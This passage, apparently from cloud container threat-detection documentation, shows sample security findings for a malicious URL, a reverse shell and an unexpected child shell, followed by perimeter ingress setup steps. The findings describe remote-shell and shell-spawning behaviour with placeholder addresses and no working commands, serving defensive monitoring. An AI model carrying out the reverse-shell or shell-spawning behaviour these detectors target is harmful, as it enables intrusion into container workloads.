        "severity": "MEDIUM",
        "sourceDisplayName": "Container Threat Detection",
        "state": "ACTIVE",
        "vulnerability": {},
        "workflowState": "NEW"
      },
      "resource": {
        "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "display_name": "CLUSTER_ID",
        "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "project_display_name": "PROJECT_ID",
        "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "parent_display_name": "PROJECT_ID",
        "type": "google.container.Cluster",
        "folders": []
      },
      "sourceProperties": {
        "Container_Image_Id": "CONTAINER_IMAGE_ID",
        "Pod_Namespace": "default",
        "Container_Name": "CONTAINER_NAME",
        "Process_Binary_Fullpath": "/bin/echo",
        "description": "A malicious URL is observed in the container workload.",
        "VM_Instance_Name": "VM_INSTANCE_NAME",
        "Pid": 1,
        "Process_Arguments": [
          "/bin/echo",
          "https://testsafebrowsing.appspot.com/s/malware.html"
        ],
        "Container_Image_Uri": "CONTAINER_IMAGE_URI",
        "Parent_Pid": 0,
        "Process_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 7717272
        },
        "Environment_Variables": [
          "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=CONTAINER_NAME",
          "DEBIAN_FRONTEND=noninteractive",
          "LANG=C.UTF-8",
          "PYTHONUNBUFFERED=1",
          "PORT=8080",
          "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
          "KUBERNETES_SERVICE_HOST=IP_ADDRESS",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443",
          "HOME=/root"
        ],
        "Container_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 0
        },
        "Pod_Name": "CONTAINER_NAME"
      }
    }
  

Reverse Shell

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Reverse Shell",
    "sourceProperties": {
      "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
      "Environment_Variables": ["HOSTNAME\u003dreverse-shell",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
      "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989861E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Container_Name": "CONTAINER_NAME",
      "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
      "Pid": 15.0,
      "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
      "Pod_Namespace": "default",
      "VM_Instance_Name": "INSTANCE_ID",
      "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
      "description": "A process started with stream redirection to a remote
      connected socket. With a reverse shell, an attacker can communicate from a
      compromised workload to an attacker-controlled machine. The attacker can
      then command and control the workload to perform desired actions, for
      example as part of a botnet.",
      "Parent_Pid": 1.0,
      "Process_Creation_Timestamp": {
        "seconds": 1.61798989E9,
        "nanos": 6.16573691E8
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:38:10.904Z",
    "createTime": "2021-04-09T17:38:15.486Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Reverse_Shell_Stdin_Redirection_Src_Ip": {
        "primitiveDataType": "STRING"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Reverse_Shell_Stdin_Redirection_Src_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Unexpected Child Shell

{
  "finding": {
    "access": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Unexpected Child Shell",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-06-29T17:34:13.765Z",
    "database": {},
    "description": "A process should not normally create child shell processes, spawn a child shell process.",
    "eventTime": "2023-06-29T17:34:13.492Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "default",
          "name": "CONTAINER_NAME",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": CONTAINER_IMAGE_ID"
            }
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER"
      ]
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/dash\"",
          "size": "31376",
          "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
          "hashedSize": "31376",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/dash\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"PYTHONUNBUFFERED\"",
            "val": "\"1\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/home/vmagent/app\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"SHLVL\"",
            "val": "\"1\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"PORT\"",
            "val": "\"8080\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"_\"",
            "val": "\"./temp/dash\""
          }
        ],
        "pid": "15",
        "parentPid": "14"
      },
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/consul\"",
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/consul\""
        ],
        "argumentsTruncated": false,
        "pid": "14",
        "parentPid": "13"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "Process_Arguments": [
      "./temp/dash"
    ],
    "Pid": 15,
    "Process_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 207040864
    },
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
    "VM_Instance_Name": "INSTANCE_ID",
    "Pod_Name": "POD_NAME",
    "Pod_Namespace": "default",
    "Container_Name": "CONTAINER_NAME",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Container_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 0
    },
    "Parent_Pid": 14,
    "Environment_Variables": [
      "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
      "KUBERNETES_PORT_443_TCP_PORT=443",
      "KUBERNETES_PORT=tcp://10.52.113.1:443",
      "PYTHONUNBUFFERED=1",
      "KUBERNETES_SERVICE_PORT=443",
      "KUBERNETES_SERVICE_HOST=10.52.113.1",
      "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "PWD=/home/vmagent/app",
      "LANG=C.UTF-8",
      "SHLVL=1",
      "HOME=/root",
      "KUBERNETES_PORT_443_TCP_PROTO=tcp",
      "KUBERNETES_SERVICE_PORT_HTTPS=443",
      "DEBIAN_FRONTEND=noninteractive",
      "PORT=8080",
      "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
      "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
      "_=./temp/dash"
    ]
  }
}
    

Scanning projects protected by a service perimeter

If you activated Security Command Center at the organization level after December 7, 2023 and have a service perimeter that blocks access to certain projects and services, you must grant the service account for Container Threat Detection inbound access to that service perimeter. Otherwise, Container Threat Detection can't produce findings related to the protected projects and services.

For organization-level activations, the service account identifier is an email address in the following format:

service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

In the preceding example, replace ORGANIZATION_ID with the numerical identifier of your organization.

If your cluster is within a VPC Service Controls service perimeter, make sure that containerthreatdetection.googleapis.com, the Container Threat Detection API, is listed as an accessible service. For more information, see Service perimeter overview.

To grant a service account inbound access to a service perimeter, follow these steps.

  1. Go to VPC Service Controls.

    Go to VPC Service Controls

  2. On the toolbar, select your Google Cloud organization.

    Project selector

  3. In the drop-down list, select the access policy that contains the service perimeter you want to grant access to.

    Access policy list

    The service perimeters associated with the access policy appear in the list.

  4. Click the name of the service perimeter.

  5. Click Edit perimeter

  6. In the navigation menu, click Ingress Policy.

  7. Click Add rule.

  8. Configure the rule as follows:

    FROM attributes of the API client

    1. For Source, select All sources.
    2. For Identity, select Selected identities.
    3. In the Add User/Service Account field, click Select.
    4. Enter the service account email address. If you have both organization-level and project-level service accounts, add both of them.
    5. Click Save.

    TO attributes of GCP services/resources

    1. For Project, select All projects.

    2. For Services, select All services or select each of the following individual services that Container Threat Detection requires:

      • Kubernetes Engine API

      If a service perimeter restricts access to a required service, Container Threat Detection can't produce findings for that service.

    3. In the navigation menu, click Save.

    For more information, see Configuring ingress and egress policies.

    What's next